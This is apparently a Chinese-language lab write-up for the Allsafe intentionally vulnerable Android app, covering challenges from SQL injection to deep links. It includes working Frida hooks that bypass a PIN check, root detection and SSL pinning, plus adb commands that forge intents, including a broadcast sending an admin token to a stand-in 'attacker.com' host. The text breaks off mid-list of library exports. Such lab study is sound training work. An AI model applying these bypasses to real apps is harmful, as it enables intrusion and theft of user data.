ONE PIECE 航海日志

Allsafe 靶场练习 WriteUp

Mon, 01 Jun 2026 00:00:00 GMT

Insecure Logging 不安全的日志记录

这个第一个挑战就是这个apk的日志信息泄露

用adb logcat查看日志信息，然后输入一个尝试密码‘weixiaoking’

在日志里面就可以看到，所以如果输入的正确密码，可能存在信息泄露

是源于此代码

Hardcoded Credentials 硬编码凭证

这一关就是说有一些硬编码的泄露

第一处内容为admin：psaaword123

第二处

Firebase Database: Firebase 数据库

漏洞描述:

Firebase 数据库漏洞源于开发者未能为其 Firebase 实时数据库或 Firestore 配置提供充分的访问控制。Firebase 实时数据库以 REST API 的形式运行，可通过在 URL 后添加 .json 访问；如果读写权限设置为“任何人”，未经身份验证的攻击者即可直接访问数据库。

在使用apkleaks对这个apk进行扫描时，发现这个apk确实用了Firebase

在jadx中搜索，url为https://allsafe-8cef0.firebaseio.com

在url后加上/.json

Insecure Shared Preferences不安全的共享偏好

漏洞描述：

当 Android 应用程序使用 SharedPreferences 机制存储敏感数据（例如用户名、密码、令牌、API 密钥、信用卡信息等）而未进行加密或缺乏足够的访问控制时，就会出现不安全的 Shared Preferences 漏洞。如果设备已获得 root 权限或运行恶意应用程序，则这些数据很容易被访问、读取和篡改。这可能导致用户数据被盗、身份验证被绕过或帐户被劫持。

每个应用都有自己的shared_prefs目录，通常位于/data/data/<包名>/shared_prefs/

我先随便设置一下用户名与密码

现在去MT管理器查看

SQL Injection SQL 注入

漏洞定义：

SQL 注入漏洞是指应用程序在未进行充分验证或过滤的情况下，直接将从用户接收的数据包含在 SQL 查询中。攻击者可以使用精心构造的输入（有效载荷）来获取对数据库的未经授权的访问权限，造成数据泄露，修改或删除数据，在某些情况下甚至可以在应用程序运行的服务器上执行命令。这种漏洞常见于 Web 应用程序、API 或移动应用程序的后端服务中。

源码

    public static final void onCreateView$lambda$0(SQLiteDatabase $db, TextInputEditText $username, SQLInjection this$0, TextInputEditText $password, View it) throws NoSuchAlgorithmException {
        Cursor cursor = $db.rawQuery("select * from user where username = '" + ((Object) $username.getText()) + "' and password = '" + this$0.md5(String.valueOf($password.getText())) + "'", null);
        Intrinsics.checkNotNullExpressionValue(cursor, "rawQuery(...)");
        StringBuilder data = new StringBuilder();
        if (cursor.getCount() > 0) {
            cursor.moveToFirst();
            do {
                String user = cursor.getString(1);
                String pass = cursor.getString(2);
                data.append("User: " + user + " \nPass: " + pass + "\n");
            } while (cursor.moveToNext());
        }
        cursor.close();
        Toast.makeText(this$0.getContext(), data, 1).show();
    }

利用sql语句漏洞，获得了所有用户的用户名与密码

PIN Bypass PIN 码旁路

漏洞描述：

PIN 码绕过漏洞是一种安全缺陷，它允许应用程序或设备绕过用户 PIN 码（个人识别码）验证，或被他人绕过。

找到源码，其实pin码已经硬编码在代码里了，我们可以直接对其进行base64解码得到4863

但这关是要让我们使用Frida来过关，我的思路是不验证随便输入一个都能通过验证，这需要我们来对验证函数进行挂钩

Java.perform(function(){
    const pin=Java.use("infosecadventures.allsafe.challenges.PinBypass");
    pin.checkPin.implementation = function (pin){
    return true;
    }
})

PS C:\Users\35159> frida -U -N infosecadventures.allsafe -l E:\ctf\linghsi\hook.js
     ____
    / _  |   Frida 17.8.0 - A world-class dynamic instrumentation toolkit
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at https://frida.re/docs/home/
   . . . .
   . . . .   Connected to Android Emulator 5554 (id=emulator-5554)
[Android Emulator 5554::infosecadventures.allsafe ]->

即使我输的不是4863，也会通过

Root Detection 根检测

漏洞描述：

Root 检测绕过漏洞允许攻击者绕过 Android 应用程序中开发者添加的用于检测设备是否已 root 的检查机制。通常情况下，应用程序应被禁止在已 root 的设备上运行，或者需要提高安全级别。然而，这些检查机制的薄弱或错误实现使得攻击者能够操纵 root 检测机制，从而使应用程序能够在已 root 的设备上运行，并禁用安全措施。

源码

public static final void onCreateView$lambda$0(RootDetection this$0, View it) {
        if (new RootBeer(this$0.getContext()).isRooted()) {
            SnackUtil snackUtil = SnackUtil.INSTANCE;
            FragmentActivity fragmentActivityRequireActivity = this$0.requireActivity();
            Intrinsics.checkNotNullExpressionValue(fragmentActivityRequireActivity, "requireActivity(...)");
            snackUtil.simpleMessage(fragmentActivityRequireActivity, "Sorry, your device is rooted!");
            return;
        }
        SnackUtil snackUtil2 = SnackUtil.INSTANCE;
        FragmentActivity fragmentActivityRequireActivity2 = this$0.requireActivity();
        Intrinsics.checkNotNullExpressionValue(fragmentActivityRequireActivity2, "requireActivity(...)");
        snackUtil2.simpleMessage(fragmentActivityRequireActivity2, "Congrats, root is not detected!");
    }
}

hook脚本，使用的类com.scottyab.rootbeer.RootBeer

Java.perform(function(){
    var rootdetection=Java.use("com.scottyab.rootbeer.RootBeer");
    rootdetection.isRooted.implementation = function (){
        return false;
    }
})

现在来检测即使我们设备已经root了，也检测不到

Deep Link Exploitation 深度链接利用

漏洞描述：

深度链接利用漏洞源于移动应用程序中使用的深度链接机制未能得到安全验证。深度链接允许用户直接重定向到应用程序的特定屏幕或功能。如果应用程序在处理通过深度链接接收的参数或调用时缺乏足够的身份验证和授权控制，攻击者就可以通过精心构造的链接访问应用程序的关键功能。这会导致一系列安全风险，例如未经授权的用户修改帐户设置、在未登录的情况下被重定向到授权屏幕，或触发敏感操作。

源码定位

public class DeepLinkTask extends AppCompatActivity {
    @Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_deep_link_task);
        Intent intent = getIntent();
        String action = intent.getAction();
        Uri data = intent.getData();
        Log.d("ALLSAFE", "Action: " + action + " Data: " + data);
        try {
            if (data.getQueryParameter("key").equals(getString(R.string.key))) {
                findViewById(R.id.container).setVisibility(0);
                SnackUtil.INSTANCE.simpleMessage(this, "Good job, you did it!");
            } else {
                SnackUtil.INSTANCE.simpleMessage(this, "Wrong key, try harder!");
            }
        } catch (Exception e) {
            SnackUtil.INSTANCE.simpleMessage(this, "No key provided!");
            Log.e("ALLSAFE", e.getMessage());
        }
    }
}

我们先去string.xml里找到内置的key

url的具体格式要看AndroidManifest.xml里的这个Activity的intent-filter

在 Android 应用程序中测试深度链接最常用的命令之一是 adb shell am start。

adb shell am start -W -a android.intent.action.VIEW -d "deeplink://parametre?query=key" com.hedef.uygulama

adb shell am start → 通过 Activity Manager 启动一个新的 intent。

-W → 等待命令完成

-a android.intent.action.VIEW → 动作中的意图（在通用视图中进行深度链接）。

-d "deeplink://..." → 深度链接 URI（根据具体情况，此处会写入 URL 或自定义方案）。

com.target.application → 目标应用程序的包名。

根据我们上面找到的信息

scheme-->allsafe(方案）
host-->infosecadventures(主机）
pathPrefix-->/congrats（路径前缀）
软件包名称-->infosecadventures.allsafe
key-->ebfb7ff0-b2f6-41c8-bef3-4fba17be410c

总和下来命令为

adb shell am start -W -a android.intent.action.VIEW -d "allsafe://infosecadventures/congrats?key=ebfb7ff0-b2f6-41c8-bef3-4fba17be410c" infosecadventures.allsafe

Insecure Broadcast Receiver 不安全的广播接收器

漏洞描述：

当 Android 应用中使用的广播接收器组件未进行适当的安全控制或未启用安全设置时，就会出现不安全的广播接收器漏洞。如果广播接收器被标记为 exports="true" 且未应用任何授权控制，其他应用或攻击者可以向该接收器发送恶意广播意图消息。这可能导致应用内触发未经授权的操作、访问敏感信息或出现意外的应用行为。

在AndroidMainfest.xml文件里确定确实是导出状态

去看源码

public class NoteReceiver extends BroadcastReceiver {
    @Override // android.content.BroadcastReceiver
    public void onReceive(Context context, Intent intent) {
        String server = intent.getStringExtra("server");
        String note = intent.getStringExtra("note");
        String notification_message = intent.getStringExtra("notification_message");
        OkHttpClient okHttpClient = new OkHttpClient.Builder().build();
        HttpUrl httpUrl = new HttpUrl.Builder().scheme("http").host(server).addPathSegment("api").addPathSegment("v1").addPathSegment("note").addPathSegment("add").addQueryParameter("auth_token", "YWxsc2FmZV9kZXZfYWRtaW5fdG9rZW4=").addQueryParameter("note", note).build();
        Log.d("ALLSAFE", httpUrl.getUrl());
        Request request = new Request.Builder().url(httpUrl).build();
        okHttpClient.newCall(request).enqueue(new Callback(this) { // from class: infosecadventures.allsafe.challenges.NoteReceiver.1
            @Override // okhttp3.Callback
            public void onFailure(Call call, IOException e) {
                Log.d("ALLSAFE", e.getMessage());
            }

            @Override // okhttp3.Callback
            public void onResponse(Call call, Response response) throws IOException {
                Log.d("ALLSAFE", ((ResponseBody) Objects.requireNonNull(response.body())).string());
            }
        });
        NotificationCompat.Builder builder = new NotificationCompat.Builder(context, "ALLSAFE");
        builder.setContentTitle("Notification from Allsafe");
        builder.setContentText(notification_message);
        builder.setSmallIcon(R.mipmap.ic_launcher_round);
        builder.setAutoCancel(true);
        builder.setChannelId("ALLSAFE");
        Notification notification = builder.build();
        NotificationManager notificationManager = (NotificationManager) context.getSystemService("notification");
        NotificationChannel notificationChannel = new NotificationChannel("ALLSAFE", "ALLSAFE_NOTIFICATION", 4);
        notificationManager.createNotificationChannel(notificationChannel);
        notificationManager.notify(1, notification);
    }
}

先来分析一下吧

从广播里取参数

发一个HTTP请求

 HttpUrl httpUrl = new HttpUrl.Builder().scheme("http").host(server).addPathSegment("api").addPathSegment("v1").addPathSegment("note").addPathSegment("add").addQueryParameter("auth_token", "YWxsc2FmZV9kZXZfYWRtaW5fdG9rZW4=").addQueryParameter("note", note).build();

组合在一起，最终http长这样

http://<server>/api/v1/note/add?auth_token=YWxsc2FmZV9kZXZfYWRtaW5fdG9rZW4=&note=<note>

异步发送

伪造命令

adb shell am broadcast -n infosecadventures.allsafe/.challenges.NoteReceiver -a infosecadventures.allsafe.action.PROCESS_NOTE --es server "attacker.com" --es note "hacked_by_me" --es notification_message "Hacked"

Vulnerable WebView 存在漏洞的 WebView

漏洞描述：

应用程序中使用的 WebView 组件通过 loadUrl() 和 loadData() 方法处理用户输入的数据，而未进行任何验证或过滤。loadUrl() 函数直接执行用户提供的 URL，而 loadData() 函数处理输入的 HTML/JavaScript 代码并将其渲染到浏览器引擎中。此外，使用 setJavaScriptEnabled(true) 允许攻击者执行恶意 JavaScript 代码。这可能使恶意用户能够在应用程序内执行 XSS 攻击、重定向到恶意网页或篡改应用程序内的数据。

源代码

输入框里的内容要么被当成 URL 打开，要么被当成 HTML 直接渲染

public class VulnerableWebView extends Fragment {
    @Override // androidx.fragment.app.Fragment
    public View onCreateView(LayoutInflater inflater, ViewGroup container, Bundle savedInstanceState) {
        View view = inflater.inflate(R.layout.fragment_vulnerable_web_view, container, false);
        final TextInputEditText payload = (TextInputEditText) view.findViewById(R.id.payload);
        final WebView webView = (WebView) view.findViewById(R.id.webView);
        webView.setWebViewClient(new WebViewClient());
        WebSettings settings = webView.getSettings();
        settings.setJavaScriptEnabled(true);
        settings.setAllowFileAccess(true);
        settings.setLoadWithOverviewMode(true);
        settings.setSupportZoom(true);
        view.findViewById(R.id.execute).setOnClickListener(new View.OnClickListener() { // from class: infosecadventures.allsafe.challenges.VulnerableWebView$$ExternalSyntheticLambda0
            @Override // android.view.View.OnClickListener
            public final void onClick(View view2) {
                this.f$0.lambda$onCreateView$0(payload, webView, view2);
            }
        });
        return view;
    }

    /* JADX INFO: Access modifiers changed from: private */
    public /* synthetic */ void lambda$onCreateView$0(TextInputEditText payload, WebView webView, View v) {
        if (!((Editable) Objects.requireNonNull(payload.getText())).toString().isEmpty()) {
            if (URLUtil.isValidUrl(((Editable) Objects.requireNonNull(payload.getText())).toString())) {
                webView.loadUrl(payload.getText().toString());
                return;
            } else {
                webView.setWebChromeClient(new WebChromeClient());
                webView.loadData(payload.getText().toString(), "text/html", "UTF-8");
                return;
            }
        }
        SnackUtil.INSTANCE.simpleMessage(requireActivity(), "No payload provided!");
    }
}

题目要求

先输入一个正常的url

这里说明允许webview访问设备的文件系统，意味着webview可以访问使用file://URL方案打开的本地文件

也可以

Certificate Pinning 证书别针

漏洞描述：

移动应用程序中用于 SSL/TLS 证书验证的证书固定机制可被绕过。通常，证书固定机制确保客户端和服务器之间的通信仅信任特定的证书，从而防止中间人攻击 (MitM)。然而，如果应用程序中的此控制被绕过，攻击者可以使用逆向工程、运行时钩子（Frida、Xposed）或薄弱的证书固定实现来解密 SSL 流量。这会削弱应用程序的安全通信机制，并允许攻击者拦截本应加密的数据（用户名、密码、令牌、会话信息等）。

运行一下frida codeshare里的SSL证书验证绕过脚本

PS C:\Users\35159> frida -U --codeshare Q0120S/bypass-ssl-pinning -f infosecadventures.allsafe
     ____
    / _  |   Frida 17.8.0 - A world-class dynamic instrumentation toolkit
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at https://frida.re/docs/home/
   . . . .
   . . . .   Connected to Android Emulator 5554 (id=emulator-5554)
Spawning `infosecadventures.allsafe`...
Hello! This is the first time you're running this particular snippet, or the snippet's source code has changed.

Project Name: Bypass SSL Pinning
Author: @Q0120S
Slug: Q0120S/bypass-ssl-pinning
Fingerprint: ac76d00550025da4fbca5adaf93948a773ed982c9b53baa44e13e437bbef401e
URL: https://codeshare.frida.re/@Q0120S/bypass-ssl-pinning

Are you sure you'd like to trust this project? [y/N] y
Adding fingerprint ac76d00550025da4fbca5adaf93948a773ed982c9b53baa44e13e437bbef401e to the trust store! You won't be prompted again unless the code changes.
Spawned `infosecadventures.allsafe`. Resuming main thread!
[Android Emulator 5554::infosecadventures.allsafe ]-> ---
Unpinning Android app...
[+] SSLPeerUnverifiedException auto-patcher
[+] HttpsURLConnection (setDefaultHostnameVerifier)
[+] HttpsURLConnection (setSSLSocketFactory)
[+] HttpsURLConnection (setHostnameVerifier)
[+] SSLContext
[+] TrustManagerImpl
[+] OkHTTPv3 (list)
[ ] OkHTTPv3 (cert)
[+] OkHTTPv3 (cert array)
[+] OkHTTPv3 ($okhttp)
[ ] Trustkit OkHostnameVerifier(SSLSession)
[ ] Trustkit OkHostnameVerifier(cert)
[ ] Trustkit PinningTrustManager
[ ] Appcelerator PinningTrustManager
[ ] OpenSSLSocketImpl Conscrypt
[ ] OpenSSLEngineSocketImpl Conscrypt
[ ] OpenSSLSocketImpl Apache Harmony
[ ] PhoneGap sslCertificateChecker
[ ] IBM MobileFirst pinTrustedCertificatePublicKey (string)
[ ] IBM MobileFirst pinTrustedCertificatePublicKey (string array)
[ ] IBM WorkLight HostNameVerifierWithCertificatePinning (SSLSocket)
[ ] IBM WorkLight HostNameVerifierWithCertificatePinning (cert)
[ ] IBM WorkLight HostNameVerifierWithCertificatePinning (string string)
[ ] IBM WorkLight HostNameVerifierWithCertificatePinning (SSLSession)
[ ] Conscrypt CertPinManager
[ ] CWAC-Netsecurity CertPinManager
[ ] Worklight Androidgap WLCertificatePinningPlugin
[ ] Netty FingerprintTrustManagerFactory
[ ] Squareup CertificatePinner (cert)
[ ] Squareup CertificatePinner (list)
[ ] Squareup OkHostnameVerifier (cert)
[ ] Squareup OkHostnameVerifier (SSLSession)
[+] Android WebViewClient (SslErrorHandler)
[ ] Android WebViewClient (WebResourceError)
[ ] Apache Cordova WebViewClient
[ ] Boye AbstractVerifier
[ ] Appmattus (CertificateTransparencyInterceptor)
[ ] Appmattus (CertificateTransparencyTrustManager)

再点击发送请求，BurpSuite就可以拦截到

Weak Cryptography 弱密码学

漏洞描述：

该应用程序使用不安全的加密方法来加密和维护敏感数据的完整性。

先看源码

固定密钥（KEY = "1nf053c4dv3n7ur3")

AES加密使用ECB模式

使用了MD5算法

public class WeakCryptography extends Fragment {
    public static final String KEY = "1nf053c4dv3n7ur3";

    public static String encrypt(String value) {
        try {
            SecretKeySpec secretKeySpec = new SecretKeySpec(KEY.getBytes(StandardCharsets.UTF_8), "AES");
            Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5PADDING");
            cipher.init(1, secretKeySpec);
            byte[] encrypted = cipher.doFinal(value.getBytes());
            return new String(encrypted);
        } catch (InvalidKeyException | NoSuchAlgorithmException | BadPaddingException | IllegalBlockSizeException | NoSuchPaddingException e) {
            e.printStackTrace();
            return null;
        }
    }

    public static String md5Hash(String text) {
        StringBuilder stringBuilder = new StringBuilder();
        try {
            MessageDigest digest = MessageDigest.getInstance("MD5");
            digest.update(text.getBytes());
            byte[] messageDigest = digest.digest();
            stringBuilder.append(String.format("%032X", new BigInteger(1, messageDigest)));
        } catch (Exception e) {
            Log.d("ALLSAFE", e.getLocalizedMessage());
        }
        return stringBuilder.toString();
    }

Insecure Service不安全的服务

主要原因就是，状态是可导出的，这意味着可以直接从终端调用它，而无需通过用户界面。这意味着任何恶意应用程序都可以利用此行为调用该服务并录制受害者的音频。

使用drozer都能扫到

(.venv) PS E:\android\drozer> drozer console connect
Selecting 636b8e9b5dcaa8b2 (BlackShark SHARK PAR-A0 9)

            ..                    ..:.
           ..o..                  .r..
            ..a..  . ....... .  ..nd
              ro..idsnemesisand..pr
              .otectorandroidsneme.
           .,sisandprotectorandroids+.
         ..nemesisandprotectorandroidsn:.
        .emesisandprotectorandroidsnemes..
      ..isandp,..,rotecyayandro,..,idsnem.
      .isisandp..rotectorandroid..snemisis.
      ,andprotectorandroidsnemisisandprotec.
     .torandroidsnemesisandprotectorandroid.
     .snemisisandprotectorandroidsnemesisan:
     .dprotectorandroidsnemesisandprotector.

drozer Console (v3.1.0)

dz> run app.package.attacksurface infosecadventures.allsafe
Attempting to run shell module
Attack Surface:
  3 activities exported
  2 broadcast receivers exported
  1 content providers exported
  1 services exported
    is debuggable
dz> run app.service.info -a infosecadventures.allsafe
Attempting to run shell module
Package: infosecadventures.allsafe
  infosecadventures.allsafe.challenges.RecorderService
    Permission: null

外部访问就行

PS C:\Users\35159> adb shell am startservice infosecadventures.allsafe/.challenges.RecorderService
Starting service: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=infosecadventures.allsafe/.challenges.RecorderService }

Object Serialization对象序列化

漏洞描述：

该应用会创建一个包含 username 、 password 和 role User 对象。此对象使用 ObjectOutputStream 进行序列化，并以 user.dat 的名称保存在外部应用存储中，具体位置为 /sdcard/Android/data/infosecadventures.allsafe/files/ 。序列化允许将对象的状态写入文件，以便稍后检索。每个 User 对象都有一个 role 字段。默认情况下，该字段设置为 "ROLE_AUTHOR" 。如果用户的角色为 "ROLE_EDITOR" ，则授予其访问特定功能的权限；否则，拒绝访问。

可利用的点就在这里，他应用信任磁盘上的序列化数据，我们可以修改文件的role字段，从而绕过限制

文件存放在

源码

package infosecadventures.allsafe.challenges;

import android.os.Bundle;
import android.text.Editable;
import android.util.Log;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.Button;
import android.widget.Toast;
import androidx.fragment.app.Fragment;
import com.google.android.material.textfield.TextInputEditText;
import infosecadventures.allsafe.R;
import infosecadventures.allsafe.utils.SnackUtil;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.Objects;

/* JADX INFO: loaded from: classes4.dex */
public class ObjectSerialization extends Fragment {
    @Override // androidx.fragment.app.Fragment
    public View onCreateView(LayoutInflater inflater, ViewGroup container, Bundle savedInstanceState) {
        View view = inflater.inflate(R.layout.fragment_object_serialization, container, false);
        final TextInputEditText username = (TextInputEditText) view.findViewById(R.id.username);
        final TextInputEditText password = (TextInputEditText) view.findViewById(R.id.password);
        Button save = (Button) view.findViewById(R.id.save);
        Button load = (Button) view.findViewById(R.id.load);
        final String path = requireActivity().getExternalFilesDir(null) + "/user.dat";
        save.setOnClickListener(new View.OnClickListener() { // from class: infosecadventures.allsafe.challenges.ObjectSerialization$$ExternalSyntheticLambda0
            @Override // android.view.View.OnClickListener
            public final void onClick(View view2) {
                this.f$0.lambda$onCreateView$0(username, password, path, view2);
            }
        });
        load.setOnClickListener(new View.OnClickListener() { // from class: infosecadventures.allsafe.challenges.ObjectSerialization$$ExternalSyntheticLambda1
            @Override // android.view.View.OnClickListener
            public final void onClick(View view2) {
                this.f$0.lambda$onCreateView$1(path, view2);
            }
        });
        return view;
    }

    /* JADX INFO: Access modifiers changed from: private */
    public /* synthetic */ void lambda$onCreateView$0(TextInputEditText username, TextInputEditText password, String path, View v) {
        if (!((Editable) Objects.requireNonNull(username.getText())).toString().isEmpty() && !((Editable) Objects.requireNonNull(password.getText())).toString().isEmpty()) {
            User user = new User(username.getText().toString(), password.getText().toString());
            try {
                File file = new File(path);
                FileOutputStream fos = new FileOutputStream(file);
                ObjectOutputStream oos = new ObjectOutputStream(fos);
                oos.writeObject(user);
                oos.close();
                fos.close();
            } catch (IOException e) {
                Log.d("ALLSAFE", e.getLocalizedMessage());
            }
            SnackUtil.INSTANCE.simpleMessage(requireActivity(), "User data successfully saved!");
            return;
        }
        SnackUtil.INSTANCE.simpleMessage(requireActivity(), "Fill out the fields!");
    }

    /* JADX INFO: Access modifiers changed from: private */
    public /* synthetic */ void lambda$onCreateView$1(String path, View v) {
        if (new File(path).exists()) {
            try {
                File file = new File(path);
                FileInputStream fis = new FileInputStream(file);
                ObjectInputStream ois = new ObjectInputStream(fis);
                User user = (User) ois.readObject();
                ois.close();
                fis.close();
                if (!user.role.equals("ROLE_EDITOR")) {
                    SnackUtil.INSTANCE.simpleMessage(requireActivity(), "Sorry, only editors have access!");
                } else {
                    SnackUtil.INSTANCE.simpleMessage(requireActivity(), "Good job!");
                    Toast.makeText(requireContext(), user.toString(), 0).show();
                }
                return;
            } catch (IOException | ClassNotFoundException e) {
                Log.d("ALLSAFE", e.getLocalizedMessage());
                return;
            }
        }
        SnackUtil.INSTANCE.simpleMessage(requireActivity(), "File not found!");
    }

    public static class User implements Serializable {
        String password;
        String role = "ROLE_AUTHOR";
        String username;

        public User() {
        }

        public User(String username, String password) {
            this.username = username;
            this.password = password;
        }

        public String toString() {
            return "User{username='" + this.username + "', password='" + this.password + "', role='" + this.role + "'}";
        }
    }
}

打开文件

直接修改保存

这就意味着我们有了更高的权限

Insecure Providers不安全的提供商

挑战中提到我们有两个不安全的内容提供商，第一个是数据库提供商，第二个是文件提供商

但我们用drozer扫的时候只有一个是可导出状态，

dz> run app.package.attacksurface infosecadventures.allsafe
Attempting to run shell module
Attack Surface:
  3 activities exported
  2 broadcast receivers exported
  1 content providers exported
  1 services exported
    is debuggable
dz> run app.service.info -a infosecadventures.allsafe
Attempting to run shell module
Package: infosecadventures.allsafe
  infosecadventures.allsafe.challenges.RecorderService
    Permission: null

我们去AndroidMainfest.xml文件看看，那个是可导出，呢个不可导出

我们可以看到数据提供商是可导出的，文件提供商是不可导出的

我们先利用数据的可导出性，看看有啥东西

PS C:\Users\35159> adb shell content query --uri "content://infosecadventures.allsafe.dataprovider"
Row: 0 id=1, user=admin, note=I can not believe that Jill is still using 123456 as her password...
Row: 1 id=2, user=elliot.alderson, note=A bug is never just a mistake. It represents something bigger. An error of thinking. That makes you who you are.
Row: 2 id=3, user=darlene.alderson, note=That’s the trick about money. Banks care more about it than anything else.
Row: 3 id=4, user=gideon.goddard, note=You’re never sure about anything unless there’s something to be sure about.

虽然文件没有导出，但FileProvider 的 grantUriPermissions="true" 这意味着 AllSafe 应用中的其他组件（例如已导出的 Activity）可以使用 Intent 和已授权的 URI 与该提供程序进行交互。

通常是通过 Intent 中的 FLAG_GRANT_READ_URI_PERMISSION 或 FLAG_GRANT_WRITE_URI_PERMISSION 标志。但是，要实现这一点，应用必须显式地共享一个 URI。

如果 AllSafe 应用中存在导出的活动、服务或广播接收器，可以接受指向 FileProvider 管理的文件的 URI 的 Intents ，那么我们就可以滥用此机制来读取或写入应该受到限制的文件。

要有效利用 FileProvider ，你需要弄清楚通过 URI 共享的文件的真实路径。Android 的 FileProvider 不会直接暴露完整的文件路径；相反，它使用 URI 映射到某些预定义目录中的文件。

在他下面可以看到xml文件的名字

直接去找

<files-path> 元素表明 FileProvider 已配置为公开应用程序内部存储 files/ 目录下的文件。具体来说， path="." 表示应用程序内部 files/ 目录中的所有文件都可能通过 FileProvider 访问。

files-path 指的是应用程序的内部存储位置 /data/data/infosecadventures.allsafe/files/

由于 path="." ，因此可以访问该目录中的所有文件

现在，是时候在 AllSafe 应用中寻找其他组件（如导出的活动），以便使用 Intent 和授权 URI 与提供商进行交互。

看作者的wp发现有一个名为 ProxyActivity 导出活动，它将 intent 作为额外的参数传递。

由于该活动会被导出，且似乎并未验证额外信息的意图或来源，因此攻击者可能利用此漏洞触发任意活动，例如启动一个带有恶意意图的活动。这意味着任何包含名为 "extra_intent" 的额外信息的意图都可能导致 ProxyActivity 启动另一个活动，而 "extra_intent" 的内容可能由攻击者控制。

Native Library

本地so库在native层

在frida交互界面

位置在

[Android Emulator 5554::Allsafe ]-> Process.findModuleByName("libnative_library.so")
{
    "base": "0x763879583000",
    "name": "libnative_library.so",
    "path": "/data/app/infosecadventures.allsafe-CW6W470gPQ-sX6s2-BUJPA==/lib/x86_64/libnative_library.so",
    "size": 311296,
    "version": null
}

导出的函数有

[Android Emulator 5554::Allsafe ]-> m.enumerateExports().map(e => e.name)
[
    "_ZN7_JNIEnv24ReleaseByteArrayElementsEP11_jbyteArrayPai",
    "_ZTSPw",
    "_ZdaPvmSt11align_val_t",
    "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE5rfindEcm",
    "_ZNSt6__ndk14stodERKNS_12basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEEPm",
    "_ZTSPx",
    "__cxa_throw",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE4nposE",
    "_ZTSPy",
    "_ZNSt10bad_typeidD0Ev",
    "_ZNSt6__ndk111char_traitsIcE6lengthEPKc",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6assignERKS5_mm",
    "__cxa_deleted_virtual",
    "_ZNSt11logic_errorD0Ev",
    "_ZTISt13runtime_error",
    "_ZNSt6__ndk111char_traitsIwE4moveEPwPKwm",
    "_ZNSt6__ndk14stolERKNS_12basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEEPmi",
    "_ZNSt9exceptionD2Ev",
    "__cxa_unexpected_handler",
    "_ZNSt9bad_allocD2Ev",
    "_ZNSt11range_errorD2Ev",
    "_ZNSt12out_of_rangeD2Ev",
    "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE12find_last_ofEPKcmm",
    "_ZNSt9type_infoD2Ev",
    "_ZNSt12domain_errorD0Ev",
    "_ZNSt16invalid_argumentD2Ev",
    "_ZNSt20bad_array_new_lengthD2Ev",
    "_ZTISt9exception",
    "_ZTIPa",
    "_Z14jstring2stringP7_JNIEnvP8_jstring",
    "_ZNSt6__ndk14stoiERKNS_12basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEEPmi",
    "_ZTIPb",
    "_ZTIDh",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEaSERKS5_",
    "_ZTIPc",
    "_ZTIDi",
    "_ZNKSt8bad_cast4whatEv",
    "_ZN7_JNIEnv14DeleteLocalRefEP8_jobject",
    "_ZNSt13runtime_errorC2ERKS_",
    "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE4copyEPcmm",
    "__cxa_rethrow",
    "_ZTIPd",
    "_ZTVN10__cxxabiv129__pointer_to_member_type_infoE",
    "_ZN7_JNIEnv16CallObjectMethodEP8_jobjectP10_jmethodIDz",
    "_ZNSt11logic_errorC1ERKNSt6__ndk112basic_stringIcNS0_11char_traitsIcEENS0_9allocatorIcEEEE",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6insertEmPKc",
    "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE4findEwm",
    "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE7compareEmmPKwm",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE4nposE",
    "_ZTVSt13runtime_error",
    "_ZSt17__throw_bad_allocv",
    "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7compareEmmRKS5_mm",
    "_ZTSN10__cxxabiv120__function_type_infoE",
    "_ZTIPf",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEED2Ev",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE9__grow_byEmmmmmm",
    "_ZTIPg",
    "_ZN7_JNIEnv14GetObjectClassEP8_jobject",
    "_ZTIN10__cxxabiv120__function_type_infoE",
    "_ZTIDn",
    "_ZTIPh",
    "_ZTIPKa",
    "_ZTSSt8bad_cast",
    "_ZN7_JNIEnv11GetMethodIDEP7_jclassPKcS3_",
    "_ZNSt13runtime_erroraSERKS_",
    "__cxa_free_exception",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6insertEmPKw",
    "_ZNSt6__ndk15stoulERKNS_12basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEEPmi",
    "_ZSt14get_unexpectedv",
    "_ZTIPKb",
    "_ZTIPi",
    "_ZNKSt20bad_array_new_length4whatEv",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7replaceEmmRKS5_mm",
    "_ZTIPKc",
    "_ZTIPj",
